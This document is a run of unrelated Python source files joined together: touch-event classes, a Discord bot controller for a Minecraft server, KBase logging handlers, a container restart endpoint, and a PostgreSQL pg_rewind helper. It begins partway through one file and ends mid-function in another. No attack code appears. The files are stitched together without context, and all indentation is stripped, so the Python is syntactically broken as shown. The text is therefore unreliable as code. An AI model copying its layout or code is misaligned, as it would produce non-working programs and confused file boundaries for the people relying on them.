def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "d {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class UpEvent(MotionEvent):
def __init__(self, contact=0):
"""
Finger Up Event
:param contact: multi-touch action, starts from 0
"""
super(UpEvent, self).__init__()
self.contact = contact
def getcmd(self, transform=None):
cmd = "u {:.0f}\nc\n".format(self.contact)
return cmd
class MoveEvent(MotionEvent):
def __init__(self, coordinates, contact=0, pressure=50):
"""
Finger Move Event
:param coordinates: finger move to coordinates in (x, y)
:param contact: multi-touch action, starts from 0
:param pressure: touch pressure
"""
super(MoveEvent, self).__init__()
self.coordinates = coordinates
self.contact = contact
self.pressure = pressure
def getcmd(self, transform=None):
if transform:
x, y = transform(*self.coordinates)
else:
x, y = self.coordinates
cmd = "m {contact} {x} {y} {pressure}\nc\n".format(contact=self.contact, x=x, y=y, pressure=self.pressure)
return cmd
class SleepEvent(MotionEvent):
def __init__(self, seconds):
self.seconds = seconds
def getcmd(self, transform=None):
return None
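# Illustrative helper (a sketch, not used by this module): compose the event classes
# above into a simple one-finger swipe that a backend like the pinch implementation
# could hand to its perform() method. Coordinates and timings are hypothetical.
def _example_swipe_events(start, end, pressure=50):
    # Press down at the start point, glide to the end point, then lift.
    return [
        DownEvent(start, contact=0, pressure=pressure),
        SleepEvent(0.05),
        MoveEvent(end, contact=0, pressure=pressure),
        SleepEvent(0.05),
        UpEvent(contact=0),
    ]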
|
minecraft.py
|
import asyncio
import dotenv as de
import multiprocessing as mp
import multiprocessing.connection as mpc
import os
import re
import subprocess as sp
import threading
import time
__all__ = ['Minecraft']
# Consts
DISCORD_MSG_LEN_MAX = 1990 # Leave a little room for error
# Load Env
de.load_dotenv()
SECRET = str.encode(os.getenv('SECRET'))
BOT_CHAN_ID = int(os.getenv('BOT_CHAN_ID'))
MC_LOG_CHAN_ID = int(os.getenv('MC_LOG_CHAN_ID'))
MC_DIR = os.getenv('MC_DIR')
MCC_PORT = int(os.getenv('MCC_PORT'))
MC_PREFIX = os.getenv('MC_PREFIX')
MC_START_TIMEOUT = int(os.getenv('MC_START_TIMEOUT'))
# Globals (for controller)
proc = None
conn = None
class Minecraft:
"""
Class for importing by the serverbot. It will handle all communication with the Minecraft
Controller (the functionality implemented by the rest of this module).
Just initialize it and register the send function for callback with the prefix.
"""
def __init__(self,
client,
guild,
prefix=MC_PREFIX,
port=MCC_PORT,
botchanid=BOT_CHAN_ID,
logchanid=MC_LOG_CHAN_ID):
"""
Initializes a new Minecraft object for communicating with a Minecraft Controller.
Args:
client: The Discord client to interact with
guild: The Discord server (guild) the bot should respond on
prefix: (Optional) The Discord server prefix. Defaults to env var
port: (Optional) The port to run the Minecraft controller on. Defaults to
environment variable
botchanid: (Optional) The id of the Discord server bot channel. Defaults to environment
variable
logchanid: (Optional) The id of the Discord server Minecraft log channel. Defaults to
environment variable
Returns:
A newly initialized Minecraft object
"""
# Set up members
self.prefix = prefix
self.port = port
self.guild = guild
self.client = client
self.logchan = guild.get_channel(logchanid)
self.botchan = guild.get_channel(botchanid)
self.__conn = None
def read_thread():
"""
Launch the read thread. This will attempt to create a connection to a mc server
controller and listen for incoming data. This thread will stay alive until the process
closes.
"""
while True:
# First connect to the server
try:
self.__conn = mpc.Client(('localhost', port), authkey=SECRET)
self.__botchan_send('Minecraft server manager connected!')
# Leaving unassigned or closing skips the next loop
except (EOFError, ConnectionRefusedError, ConnectionResetError, BrokenPipeError):
if self.__conn is not None:
self.__conn.close()
time.sleep(10)  # Wait a reasonable amount of time and check again
# Read loop
while self.__conn and (not self.__conn.closed):
# Try to read and direct messages appropriately
try:
line = self.__conn.recv()
[status, msg] = line.split('|', 1)
status = status.strip()
if status == 'LOG':
self.__logchan_send(msg)
elif status == 'OK':
self.__botchan_send(msg)
else:
self.__botchan_send(f'{status}: {msg}')
# Close the connection so we end the loop and try to reconnect at the top
except (EOFError, ConnectionResetError, BrokenPipeError):
self.__botchan_send('ERR: The Minecraft server manager crashed. Attempting '
'to reconnect')
self.__conn.close()
# Start a daemon reader thread
reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()
def try_send(self, msg):
"""
Try to send a message to the controller. If we fail, print an error to the bot channel. We
don't need to handle the failure here since the reader reads in a tight loop so a connection
failure will be caught there as well and will trigger a reconnect.
Args:
msg: The message to try to send
"""
try:
self.__conn.send(msg)
except (OSError, AttributeError):
# We lost connection. We'll just log it and let the read loop handle reconnecting
self.__botchan_send('Could not send command to Minecraft server manager')
def __logchan_send(self, msg):
"""
Send a message to the log channel.
Args:
msg: The message to send
"""
asyncio.run_coroutine_threadsafe(self.logchan.send(msg), self.client.loop)
def __botchan_send(self, msg):
"""
Send a message to the bot channel.
Args:
msg: The message to send
"""
asyncio.run_coroutine_threadsafe(self.botchan.send(msg), self.client.loop)
def mc_running():
"""
Check if the Minecraft server process is running.
Returns:
True if the server process is running, False otherwise
"""
return proc and proc.poll() is None
def try_send(msg):
"""
Try to send a message to the connected client (usually serverbot). We don't need to handle the
failure here since the reader reads in a tight loop so a connection failure will be caught there
as well and will trigger a reconnect. We also can't send an error message since the client isn't
connected to receive the message so we'll just fail silently.
Args:
msg: The message to try to send
"""
try:
conn.send(msg + '\n')
except (OSError, AttributeError):
# Since we lost connection to the client we can't really notify them there's an issue, so
# just log it and fail
print(f'try_send: Failed to send: {msg}')
def mc_writeline(cmd):
"""
Try to send a message to the Minecraft process. We don't need to handle the failure here since the
reader will catch it and mark the server dead.
Args:
cmd: The Minecraft command to send
Returns:
True if successful, False otherwise
"""
try:
proc.stdin.write(str.encode(f'{cmd}\n'))
proc.stdin.flush()
return True
except AttributeError:
print(f'mc_writeline: Server is dead')
return False
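# For example (illustrative): mc_writeline('say Backup starting in 5 minutes')
# would broadcast a chat message, provided the server process is alive.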
def mc_start():
"""
Start a new Minecraft process and spin up a listener thread to handle incoming data.
Returns:
True if the server was started successfully, False otherwise (e.g. if server is already
running)
"""
global proc
# Fastfail if the server is running, else start it
if mc_running():
return False
else:
proc = sp.Popen(['java', '-Xmx1024M', '-Xms1024M', '-jar', 'server.jar', 'nogui'],
stdin=sp.PIPE,
stdout=sp.PIPE,
stderr=sp.STDOUT,
cwd=MC_DIR)
# Wait for the server to start up to the specified timeout
line = ''
startup_buf = ''
start_time = time.time()
timeout = MC_START_TIMEOUT #seconds
res = re.compile(r'\[[0-9:]+\] \[Server thread/INFO\]: Done \([0-9.]+s\)! For help, type "help"')
# Look for the startup line
while not res.match(line.strip()):
# Check timeout
if time.time() > (start_time + timeout):
try_send(f'LOG |{startup_buf}')
return False
# Fetch a new line. If the read fails, dump the log and fail
try:
line = bytes.decode(proc.stdout.readline())
except BrokenPipeError:
try_send(f'LOG |{startup_buf}')
return False
# Dump the current log if we would go over the max message size
if len(startup_buf) > (DISCORD_MSG_LEN_MAX - len(line)):
try_send(f'LOG |{startup_buf}')
startup_buf = ''
# Add the current line to the buf
startup_buf += line
# Dump the buffer
if startup_buf:
try_send(f'LOG |{startup_buf}')
# TODO: add Event to close reader during stop
# Start a reader for this process
def read_thread():
"""
Launch the reader thread. This will attempt to read from the Minecraft process and send
it to the client (serverbot) to process. If a send fails, it will keep retrying until it
succeeds. If a read fails, we continue and the top loop will catch the dead process and
report it to the client (serverbot)
"""
line = None
while mc_running():
# Grab a new line if we're not holding onto a failed send
if not line:
# Try reading a line. If this fails, check that the proc didn't die
try:
line = proc.stdout.readline()
except BrokenPipeError:
print('reader: Pipe read failed!')
continue # Top loop will handle dead process, otherwise we retry
# Check that we have something to send
if line:
# Wait for a connection to be established
while not conn or conn.closed:
time.sleep(10) # wait for the connection to come back up
# Try to send the thing
try:
conn.send(f'LOG |{bytes.decode(line)}')
line = None
# If we fail, close the connection (remote probably disconnected) and leave the
# line so we can retry it
except OSError:
print('reader: Client disconnected!')
conn.close()
print('reader: Process exited. Exiting reader thread.')
# Start up the reader thread
reader = threading.Thread(target=read_thread)
reader.daemon = True
reader.start()
return True
def mc_stop():
"""
Cleanly save and stop the currently running Minecraft server, if any
Returns:
True if successful, False otherwise (e.g. if server isn't running)
"""
global proc
if not mc_running():
return False
else:
mc_writeline('stop')
# wait to stop
while proc.poll() is None:
time.sleep(1)
proc = None
return True
def mc_whitelist(name, add):
"""
Add a user to or remove a user from the whitelist
Args:
name: The name of the user to be added or removed
add: If set to True, add the user, else remove
Returns:
True if successful, False otherwise (e.g. if the server is not running)
"""
result = False
if mc_running():
if add:
result = mc_writeline(f'whitelist add {name}')
mc_writeline('whitelist reload')
else:
result = mc_writeline(f'whitelist remove {name}')
mc_writeline('whitelist reload')
mc_ls_whitelist() # Print the whitelist so we can verify the operation
return result
def mc_ls_whitelist():
"""
Have the server print the current whitelist to the log
Returns:
True if successful, False otherwise (e.g. if the server is not running)
"""
result = False
if mc_running():
result = mc_writeline('whitelist list')
return result
def mc_command(cmd, args):
"""
Interpret a command given by the client (serverbot) and execute the appropriate action
Args:
cmd: The command to run
args: (Optional) Any optional arguments to the command
"""
# Remove newlines to prevent command injection
if args is not None:
args = args.replace('\n', '')
print(f'mc_command: {cmd} {args}')
help_msg = ('ServerBot Minecraft commands:\n'
f'!{MC_PREFIX} help - print this message\n'
f'!{MC_PREFIX} ping - ping the server\n'
f'!{MC_PREFIX} status - check the server status\n'
f'!{MC_PREFIX} start - start the server\n'
f'!{MC_PREFIX} stop - stop the server\n'
f'!{MC_PREFIX} whitelist <add|remove|list> [player] - list or modify the whitelist')
# f'!{MC_PREFIX} cmd <command> - send command to the server\n'
# Print help message
if cmd == 'help':
try_send(f'OK |{help_msg}')
# Start the server
elif cmd == 'start':
result = mc_start()
if result:
try_send('OK |Minecraft server started')
elif mc_running():
try_send('ERR |Minecraft server is already running')
else:
try_send('ERR |Unable to start Minecraft server')
# Stop the server
elif cmd == 'stop':
result = mc_stop()
if result:
try_send('OK |Minecraft server stopped')
elif mc_running():
try_send('ERR |Unable to stop Minecraft server')
else:
try_send('ERR |Minecraft Server is not running')
# Ping
elif cmd == 'ping':
try_send(f'OK |pong')
# Print the server status
elif cmd == 'status':
if mc_running():
try_send('OK |Minecraft Server is running')
else:
try_send('OK |Minecraft Server is not running')
# Add, remove, or show the whitelist
elif cmd == 'whitelist':
if args:
# Parse the extra args
arglist = args.split()
wl_cmd = arglist[0]
wl_name = None
if len(arglist) == 2:
wl_name = arglist[1]
# Show the whitelist
if wl_cmd == 'list':
result = mc_ls_whitelist()
if result:
try_send('OK |Success - check the log for current whitelist')
else:
try_send('ERR |Minecraft Server is not running')
return
# Add a user
if wl_cmd == 'add' and wl_name:
result = mc_whitelist(wl_name, True)
if result:
try_send('OK |Change submitted - check the log for success')
else:
try_send('ERR |Minecraft Server is not running')
return
# Remove a user
elif wl_cmd == 'remove' and wl_name:
result = mc_whitelist(wl_name, False)
if result:
try_send('OK |Change submitted - check the log for success')
else:
try_send('ERR |Minecraft Server is not running')
return
# We didn't hit any valid cases
try_send(f'ERR |Usage: !mc whitelist <add|remove|list> [player]')
# # Send an arbitrary command to the server
# elif cmd == 'cmd':
# if proc:
# mc_writeline(args)
# try_send('OK |')
# else:
# try_send('ERR |Minecraft Server is not running')
# We didn't get a valid command
else:
try_send(f'ERR |Unknown command: {cmd}')
try_send(f'OK |{help_msg}')
# Main
if __name__ == '__main__':
# Open IPC channel
listener = mpc.Listener(('localhost', MCC_PORT), authkey=SECRET)
while True:
# Wait until we connect to a client (serverbot)
try:
conn = listener.accept()
except (EOFError, ConnectionResetError, BrokenPipeError):
print('main: Failed to connect to client')
continue
print('main: Client connected!')
# If connection succeeded, listen for incoming commands
while conn and (not conn.closed):
# Try to receive a command and execute it. If there's a failure, we assume the
# connection failed and close it (in order to reopen it)
try:
line = conn.recv()
tokens = line.split(None, 1)
cmd = tokens[0]
args = None
if len(tokens) > 1:
args = tokens[1].rstrip()
mc_command(cmd, args)
except (EOFError, ConnectionResetError, BrokenPipeError):
print(f'main: Client disconnected!')
conn.close()
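# Client-side sketch (illustrative, lives in serverbot rather than here): the bot
# connects over the same multiprocessing.connection channel and exchanges plain-text
# commands and "STATUS |message" replies, e.g.:
#   conn = mpc.Client(('localhost', MCC_PORT), authkey=SECRET)
#   conn.send('status')
#   print(conn.recv())   # e.g. "OK |Minecraft Server is running"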
|
kblogging.py
|
"""
Common narrative logging functions.
To log an event with proper metadata and formatting, use 'log_event'.
You can also do free-form logs, but these will be ignored by
most upstream consumers.
"""
__author__ = 'Dan Gunter <dkgunter@lbl.gov>'
__date__ = '2014-07-31'
import collections
import logging
from logging import handlers
import os
import threading
import time
# Local
from .util import kbase_env
from . import log_proxy
from .log_common import format_event
## Constants
KBASE_TMP_DIR = "/tmp"
KBASE_TMP_LOGFILE = os.path.join(KBASE_TMP_DIR, "kbase-narrative.log")
# env var with location of proxy config file
KBASE_PROXY_ENV = 'KBASE_PROXY_CONFIG'
## Internal logging
_log = logging.getLogger("tornado.application")
# WTF is going on logging
#def _logdbg(m):
# open("/tmp/wtf", "a").write(m + "\n")
## External functions
def get_logger(name="", init=False):
"""Get a given KBase log obj.
:param name: name (a.b.c) of the logging namespace, which may be
relative or absolute (starting with 'biokbase.'), or
empty in which case the 'biokbase' logger is returned
:param init: If true, re-initialize the file/socket log handlers
:return: Log object
:rtype: LogAdapter
"""
if init:
reset_handlers()
return logging.getLogger(_kbase_log_name(name))
def log_event(log, event, mapping):
"""Log an event and a mapping.
For example::
log_event(_log, "collision", {"who":"unstoppable force",
"with":"immovable object", "where":"kbase"})
"""
msg = format_event(event, mapping)
log.info(msg)
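# Illustrative usage (logger name and event fields are hypothetical):
#   log = get_logger("narrative.jobs")
#   log_event(log, "job.start", {"job_id": "1234", "method": "run_app"})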
## Internal functions and classes
def _kbase_log_name(name):
"""Smarter name of KBase logger."""
# no name => root
if not name:
return "biokbase"
# absolute name
if name.startswith("biokbase."):
return name
# relative name
return "biokbase." + name
def _has_handler_type(log, type_):
return any(map(lambda h: isinstance(h, type_), log.handlers))
## Custom handlers
class BufferedSocketHandler(handlers.SocketHandler):
"""Buffer up messages to a socket, sending them asynchronously.
Starts a separate thread to pull messages off and send them.
Ignores any messages that did not come from `log_event()`, above.
"""
def __init__(self, *args):
handlers.SocketHandler.__init__(self, *args)
self._dbg = _log.isEnabledFor(logging.DEBUG)
if self._dbg:
_log.debug("Created SocketHandler with args = {}".format(args))
self.buf = collections.deque([], 100)
self.buf_lock = threading.Lock()
# start thread to send data from buffer
self.thr = threading.Thread(target=self.emitter)
self.thr.daemon = True
self._stop = False
self.extra = {}
self.thr.start()
def close(self):
if self.thr:
self._stop = True
self.thr.join()
self.thr = None
handlers.SocketHandler.close(self)
def emitter(self):
while not self._stop:
try:
self.buf_lock.acquire()
item = self.buf.popleft()
if not self._emit(item):
self.buf.appendleft(item)
self.buf_lock.release()
time.sleep(0.1)
else:
self.buf_lock.release()
except IndexError:
self.buf_lock.release()
time.sleep(0.1)
def emit(self, record):
if self._skip(record):
return
# stuff 'extra' from environment into record
#_logdbg("@@ stuffing into record: {}".format(kbase_env))
record.__dict__.update(kbase_env)
self.buf_lock.acquire()
try:
self.buf.append(record)
finally:
self.buf_lock.release()
def _skip(self, record):
"""Return True if this record should not go to a socket"""
# Do not forward records that didn't get logged through
# kblogging.log_event
if record.funcName != 'log_event':
if self._dbg:
_log.debug("Skip: funcName {} != log_event"
.format(record.funcName))
return True
def _emit(self, record):
"""Re-implement to return a success code."""
success = False
try:
s = self.makePickle(record)
self.send(s)
success = True
except (KeyboardInterrupt, SystemExit):
raise
except Exception as err:
_log.debug("Emit record to socket failed: {}".format(err))
self.handleError(record)
if success and _log.isEnabledFor(logging.DEBUG):
_log.debug("Record sent to socket")
return success
def init_handlers():
"""Initialize and add the log handlers.
We only allow one FileHandler and one SocketHandler to exist,
no matter how many times this is called.
"""
# Turn on debugging by setting environment variable KBASE_DEBUG.
if os.environ.get("KBASE_DEBUG", None):
g_log.setLevel(logging.DEBUG)
else:
g_log.setLevel(logging.INFO)
if not _has_handler_type(g_log, logging.FileHandler):
hndlr = logging.FileHandler(KBASE_TMP_LOGFILE)
fmtr = logging.Formatter("%(levelname)s %(asctime)s %(name)s %(message)s")
hndlr.setFormatter(fmtr)
g_log.addHandler(hndlr)
if not _has_handler_type(g_log, handlers.SocketHandler):
cfg = get_proxy_config()
g_log.debug("Opening socket to proxy at {}:{}".format(
cfg.host, cfg.port))
sock_handler = BufferedSocketHandler(cfg.host, cfg.port)
g_log.addHandler(sock_handler)
def get_proxy_config():
config_file = os.environ.get(KBASE_PROXY_ENV, None)
if config_file:
_log.info("Configuring KBase logging from file '{}'".format(config_file))
else:
_log.warn("Configuring KBase logging from defaults ({} is empty, or not found)"
.format(KBASE_PROXY_ENV))
# return log_proxy.ProxyConfiguration(config_file)
return log_proxy.ProxyConfigurationWrapper(config_file)
def reset_handlers():
"""Remove & re-add all handlers."""
while g_log.handlers:
g_log.removeHandler(g_log.handlers.pop())
init_handlers()
## Run the rest of this on import
# Get root log obj.
g_log = get_logger()
# If no handlers, initialize them
if not g_log.handlers:
init_handlers()
class NarrativeUIError(object):
"""Created by Narrative UI javascript on an error.
"""
ui_log = get_logger("narrative_ui")
def __init__(self, is_fatal, where="unknown location", what="unknown condition"):
info = {"function": where, "msg": what}
msg = format_event("ui.error", info)
log_method = (self.ui_log.error, self.ui_log.critical)[is_fatal]
log_method(msg)
|
control.py
|
import asyncio
import os
import logging
from time import sleep
import aiohttp
from aiohttp import web
from threading import Thread
log = logging.getLogger(__name__)
def do_restart():
""" This is the (somewhat) synchronous method to use to do a restart.
It actually starts a thread that does the restart. `__wait_and_restart`,
on the other hand, should not be called directly, because it will block
until the system restarts.
"""
Thread(target=__wait_and_restart).start()
def __wait_and_restart():
""" Delay and then execute the restart. Do not call directly. Instead, call
`do_restart()`.
"""
log.info('Restarting server')
sleep(1)
# We can use the default event loop here because this
# is actually running in a thread. We use aiohttp here because urllib is
# painful and we don’t have `requests`.
loop = asyncio.new_event_loop()
loop.run_until_complete(_resin_supervisor_restart())
async def _resin_supervisor_restart():
""" Execute a container restart by requesting it from the supervisor.
Note that failures here are returned but most likely will not be
sent back to the caller, since this is run in a separate worker thread.
If the system is not responding, look for these log messages.
"""
supervisor = os.environ.get('RESIN_SUPERVISOR_ADDRESS',
'http://127.0.0.1:48484')
restart_url = supervisor + '/v1/restart'
api = os.environ.get('RESIN_SUPERVISOR_API_KEY', 'unknown')
app_id = os.environ.get('RESIN_APP_ID', 'unknown')
async with aiohttp.ClientSession() as session:
async with session.post(restart_url,
params={'apikey': api},
json={'appId': app_id,
'force': True}) as resp:
body = await resp.read()
if resp.status != 202:
log.error("Could not shut down: {}: {}"
.format(resp.status, body))
async def restart(request):
"""
Returns OK, then waits approximately 1 second and restarts container
"""
do_restart()
return web.json_response({"message": "restarting"})
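# Illustrative wiring only (the real application setup lives elsewhere, and the
# route path is hypothetical):
#   app = web.Application()
#   app.router.add_post('/server/restart', restart)
#   web.run_app(app)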
|
rewind.py
|
import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
def format_lsn(lsn, full=False):
template = '{0:X}/{1:08X}' if full else '{0:X}/{1:X}'
return template.format(lsn >> 32, lsn & 0xFFFFFFFF)
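# For example (illustrative values):
#   format_lsn(0x16B374D48)            -> '1/6B374D48'
#   format_lsn(0x10000002A, full=True) -> '1/0000002A'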
class Rewind(object):
def __init__(self, postgresql):
self._postgresql = postgresql
self._checkpoint_task_lock = Lock()
self.reset_state()
@staticmethod
def configuration_allows_rewind(data):
return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'
@property
def can_rewind(self):
""" check if pg_rewind executable is there and that pg_controldata indicates
we have either wal_log_hints or checksums turned on
"""
# low-hanging fruit: check if pg_rewind configuration is there
if not self._postgresql.config.get('use_pg_rewind'):
return False
cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
try:
ret = subprocess.call(cmd, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
if ret != 0: # pg_rewind is not there, close up the shop and go home
return False
except OSError:
return False
return self.configuration_allows_rewind(self._postgresql.controldata())
@property
def can_rewind_or_reinitialize_allowed(self):
return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind
def trigger_check_diverged_lsn(self):
if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
self._state = REWIND_STATUS.CHECK
@staticmethod
def check_leader_is_not_in_recovery(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return True
logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
except Exception:
return logger.exception('Exception when working with leader')
def _get_checkpoint_end(self, timeline, lsn):
"""The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
Hence, the only reliable way to figure out where it ends is to read the record from the file with the help of pg_waldump
and parse the output. We try to read two records, and expect that it will fail to read the second one:
`pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
cmd = self._postgresql.pgcommand('pg_{0}dump'.format(self._postgresql.wal_name))
lsn8 = format_lsn(lsn, True)
lsn = format_lsn(lsn)
env = os.environ.copy()
env.update(LANG='C', LC_ALL='C', PGDATA=self._postgresql.data_dir)
try:
waldump = subprocess.Popen([cmd, '-t', str(timeline), '-s', lsn, '-n', '2'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
out, err = waldump.communicate()
waldump.wait()
except Exception as e:
logger.error('Failed to execute `%s -t %s -s %s -n 2`: %r', cmd, timeline, lsn, e)
else:
out = out.decode('utf-8').rstrip().split('\n')
err = err.decode('utf-8').rstrip().split('\n')
pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
i = err[0].find(pattern) + len(pattern)
j = err[0].find(": wanted ", i)
if j > -1:
try:
return parse_lsn(err[0][i:j])
except Exception as e:
logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
logger.error('Failed to parse `%s -t %s -s %s -n 2` output', cmd, timeline, lsn)
logger.error(' stdout=%s', '\n'.join(out))
logger.error(' stderr=%s', '\n'.join(err))
return 0
def _get_local_timeline_lsn_from_controldata(self):
in_recovery = timeline = lsn = None
data = self._postgresql.controldata()
try:
if data.get('Database cluster state') == 'shut down in recovery':
in_recovery = True
lsn = data.get('Minimum recovery ending location')
timeline = int(data.get("Min recovery ending loc's timeline"))
if lsn == '0/0' or timeline == 0: # it was a master when it crashed
data['Database cluster state'] = 'shut down'
if data.get('Database cluster state') == 'shut down':
in_recovery = False
lsn = data.get('Latest checkpoint location')
timeline = int(data.get("Latest checkpoint's TimeLineID"))
except (TypeError, ValueError):
logger.exception('Failed to get local timeline and lsn from pg_controldata output')
if lsn is not None:
try:
lsn = parse_lsn(lsn)
except (IndexError, ValueError) as e:
logger.error('Exception when parsing lsn %s: %r', lsn, e)
lsn = None
return in_recovery, timeline, lsn
def _get_local_timeline_lsn(self):
if self._postgresql.is_running(): # if postgres is running - get timeline from replication connection
in_recovery = True
timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
lsn = self._postgresql.replayed_location()
else: # otherwise analyze pg_controldata output
in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()
log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
return in_recovery, timeline, lsn
@staticmethod
def _log_master_history(history, i):
start = max(0, i - 3)
end = None if i + 4 >= len(history) else i + 2
history_show = []
def format_history_line(line):
return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])
for line in history[start:end]:
history_show.append(format_history_line(line))
if line != history[-1]:
history_show.append('...')
history_show.append(format_history_line(history[-1]))
logger.info('master: history=%s', '\n'.join(history_show))
def _conn_kwargs(self, member, auth):
ret = member.conn_kwargs(auth)
if not ret.get('database'):
ret['database'] = self._postgresql.database
return ret
def _check_timeline_and_lsn(self, leader):
in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
if local_timeline is None or local_lsn is None:
return
if isinstance(leader, Leader):
if leader.member.data.get('role') != 'master':
return
# standby cluster
elif not self.check_leader_is_not_in_recovery(self._conn_kwargs(leader, self._postgresql.config.replication)):
return
history = need_rewind = None
try:
with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
cur.execute('IDENTIFY_SYSTEM')
master_timeline = cur.fetchone()[1]
logger.info('master_timeline=%s', master_timeline)
if local_timeline > master_timeline: # Not always supported by pg_rewind
need_rewind = True
elif local_timeline == master_timeline:
need_rewind = False
elif master_timeline > 1:
cur.execute('TIMELINE_HISTORY %s', (master_timeline,))
history = bytes(cur.fetchone()[1]).decode('utf-8')
logger.debug('master: history=%s', history)
except Exception:
return logger.exception('Exception when working with master via replication connection')
if history is not None:
history = list(parse_history(history))
for i, (parent_timeline, switchpoint, _) in enumerate(history):
if parent_timeline == local_timeline:
# We don't need to rewind when:
# 1. for replica: replayed location is not ahead of switchpoint
# 2. for the former primary: end of checkpoint record is the same as switchpoint
if in_recovery:
need_rewind = local_lsn > switchpoint
elif local_lsn >= switchpoint:
need_rewind = True
else:
need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
break
elif parent_timeline > local_timeline:
break
self._log_master_history(history, i)
self._state = REWIND_STATUS.NEED if need_rewind else REWIND_STATUS.NOT_NEED
def rewind_or_reinitialize_needed_and_possible(self, leader):
if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
self._check_timeline_and_lsn(leader)
return leader and leader.conn_url and self._state == REWIND_STATUS.NEED
def __checkpoint(self, task, wakeup):
try:
result = self._postgresql.checkpoint()
except Exception as e:
result = 'Exception: ' + str(e)
with task:
task.complete(not bool(result))
if task.result:
wakeup()
def ensure_checkpoint_after_promote(self, wakeup):
"""After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
with self._checkpoint_task_lock:
if self._checkpoint_task:
with self._checkpoint_task:
if self._checkpoint_task.result:
self._state = REWIND_STATUS.CHECKPOINT
if self._checkpoint_task.result is not False:
return
else:
self._checkpoint_task = CriticalTask()
return Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()
if self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
self._state = REWIND_STATUS.CHECKPOINT
def checkpoint_after_promote(self):
return self._state == REWIND_STATUS.CHECKPOINT
def _fetch_missing_wal(self, restore_command, wal_filename):
cmd = ''
length = len(restore_command)
i = 0
while i < length:
if restore_command[i] == '%' and i + 1 < length:
i += 1
if restore_command[i] == 'p':
cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
elif restore_command[i] == 'f':
cmd += wal_filename
elif restore_command[i] == 'r':
cmd += '000000010000000000000001'
elif restore_command[i] == '%':
cmd += '%'
else:
cmd += '%'
i -= 1
else:
cmd += restore_command[i]
i += 1
logger.info('Trying to fetch the missing wal: %s', cmd)
return self._postgresql.cancellable.call(shlex.split(cmd)) == 0
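# Illustrative substitution (paths and file name are hypothetical): with
# restore_command = 'cp /wal_archive/%f %p' and wal_filename =
# '00000002000000000000008A', the command executed becomes
# 'cp /wal_archive/00000002000000000000008A <wal_dir>/00000002000000000000008A'.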
def _find_missing_wal(self, data):
# could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
pattern = 'could not open file "'
for line in data.decode('utf-8').split('\n'):
b = line.find(pattern)
if b > -1:
b += len(pattern)
e = line.find('": ', b)
if e > -1 and '/' in line[b:e]:
waldir, wal_filename = line[b:e].rsplit('/', 1)
if waldir.endswith('/pg_' + self._postgresql.wal_name) and len(wal_filename) == 24:
return wal_filename
def pg_rewind(self, r):
# prepare pg_rewind connection
env = self._postgresql.config.write_pgpass(r)
env.update(LANG='C', LC_ALL='C', PGOPTIONS='-c statement_timeout=0')
dsn = self._postgresql.config.format_dsn(r, True)
logger.info('running pg_rewind from %s', dsn)
restore_command = self._postgresql.config.get('recovery_conf', {}).get('restore_command') \
if self._postgresql.major_version < 120000 else self._postgresql.get_guc_value('restore_command')
cmd = [self._postgresql.pgcommand('pg_rewind')]
if self._postgresql.major_version >= 130000 and restore_command:
cmd.append('--restore-target-wal')
cmd.extend(['-D', self._postgresql.data_dir, '--source-server', dsn])
while True:
results = {}
ret = self._postgresql.cancellable.call(cmd, env=env, communicate=results)
logger.info('pg_rewind exit code=%s', ret)
if ret is None:
return False
logger.info(' stdout=%s', results['stdout'].decode('utf-8'))
logger.info(' stderr=%s', results['stderr'].decode('utf-8'))
if ret == 0:
return True
if not restore_command or self._postgresql.major_version >= 130000:
return False
missing_wal = self._find_missing_wal(results['stderr']) or self._find_missing_wal(results['stdout'])
if not missing_wal:
return False
if not self._fetch_missing_wal(restore_command, missing_wal):
logger.info('Failed to fetch WAL segment %s required for pg_rewind', missing_wal)
return False
def execute(self, leader):
if self._postgresql.is_running() and not self._postgresql.stop(checkpoint=False):
return logger.warning('Can not run pg_rewind because postgres is still running')
